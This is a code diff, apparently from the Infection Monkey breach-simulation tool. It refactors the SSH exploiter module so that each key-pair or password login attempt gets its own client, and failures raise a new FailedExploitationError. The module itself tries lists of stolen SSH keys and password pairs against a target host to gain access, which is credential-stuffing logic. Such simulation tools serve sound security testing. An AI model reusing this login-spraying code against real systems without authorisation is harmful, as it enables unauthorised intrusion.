SSH banner read timeout exception (tunneling) bugfix

monkey/infection_monkey/exploit/sshexec.py

@@ -5,11 +5,11 @@ import time
 import paramiko
 
 import infection_monkey.monkeyfs as monkeyfs
-from common.utils.exploit_enum import ExploitType
 from infection_monkey.exploit import HostExploiter
 from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
 from infection_monkey.exploit.tools.helpers import get_interface_to_target
 from infection_monkey.model import MONKEY_ARG
+from infection_monkey.exploit.tools.exceptions import FailedExploitationError
 from infection_monkey.network.tools import check_tcp_port
 from common.utils.exploit_enum import ExploitType
 from common.utils.attack_utils import ScanStatus
@@ -38,15 +38,16 @@ class SSHExploiter(HostExploiter):
             LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
             self._update_timestamp = time.time()
 
-    def exploit_with_ssh_keys(self, port, ssh):
+    def exploit_with_ssh_keys(self, port) -> paramiko.SSHClient:
         user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs()
 
-        exploited = False
-
         for user, ssh_key_pair in user_ssh_key_pairs:
             # Creating file-like private key for paramiko
             pkey = io.StringIO(ssh_key_pair['private_key'])
             ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip'])
+
+            ssh = paramiko.SSHClient()
+            ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
             try:
                 pkey = paramiko.RSAKey.from_private_key(pkey)
             except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
@@ -55,52 +56,49 @@ class SSHExploiter(HostExploiter):
                 ssh.connect(self.host.ip_addr,
                             username=user,
                             pkey=pkey,
-                            port=port,
-                            timeout=None)
+                            port=port)
                 LOG.debug("Successfully logged in %s using %s users private key",
                           self.host, ssh_string)
-                exploited = True
                 self.report_login_attempt(True, user, ssh_key=ssh_string)
-                break
-            except Exception as exc:
+                return ssh
+            except Exception:
+                ssh.close()
                 LOG.debug("Error logging into victim %r with %s"
                           " private key", self.host,
                           ssh_string)
                 self.report_login_attempt(False, user, ssh_key=ssh_string)
                 continue
-        return exploited
+        raise FailedExploitationError
 
-    def exploit_with_login_creds(self, port, ssh):
+    def exploit_with_login_creds(self, port) -> paramiko.SSHClient:
         user_password_pairs = self._config.get_exploit_user_password_pairs()
 
-        exploited = False
-
         for user, current_password in user_password_pairs:
+
+            ssh = paramiko.SSHClient()
+            ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
             try:
                 ssh.connect(self.host.ip_addr,
                             username=user,
                             password=current_password,
-                            port=port,
-                            timeout=None)
+                            port=port)
 
                 LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
                           self.host, user, self._config.hash_sensitive_data(current_password))
-                exploited = True
                 self.add_vuln_port(port)
                 self.report_login_attempt(True, user, current_password)
-                break
+                return ssh
 
             except Exception as exc:
                 LOG.debug("Error logging into victim %r with user"
                           " %s and password (SHA-512) '%s': (%s)", self.host,
                           user, self._config.hash_sensitive_data(current_password), exc)
                 self.report_login_attempt(False, user, current_password)
+                ssh.close()
                 continue
-        return exploited
+        raise FailedExploitationError
 
     def _exploit_host(self):
-        ssh = paramiko.SSHClient()
-        ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
 
         port = SSH_PORT
         # if ssh banner found on different port, use that port.
@@ -113,14 +111,14 @@ class SSHExploiter(HostExploiter):
             LOG.info("SSH port is closed on %r, skipping", self.host)
             return False
 
-        # Check for possible ssh exploits
-        exploited = self.exploit_with_ssh_keys(port, ssh)
-        if not exploited:
-            exploited = self.exploit_with_login_creds(port, ssh)
-
-        if not exploited:
-            LOG.debug("Exploiter SSHExploiter is giving up...")
-            return False
+        try:
+            ssh = self.exploit_with_ssh_keys(port)
+        except FailedExploitationError:
+            try:
+                ssh = self.exploit_with_login_creds(port)
+            except FailedExploitationError:
+                LOG.debug("Exploiter SSHExploiter is giving up...")
+                return False
 
         if not self.host.os.get('type'):
             try:

monkey/infection_monkey/exploit/tools/exceptions.py

@@ -2,4 +2,7 @@
 
 class ExploitingVulnerableMachineError(Exception):
     """ Raise when exploiter failed, but machine is vulnerable"""
-    pass
+
+
+class FailedExploitationError(Exception):
+    """ Raise when exploiter fails instead of returning False"""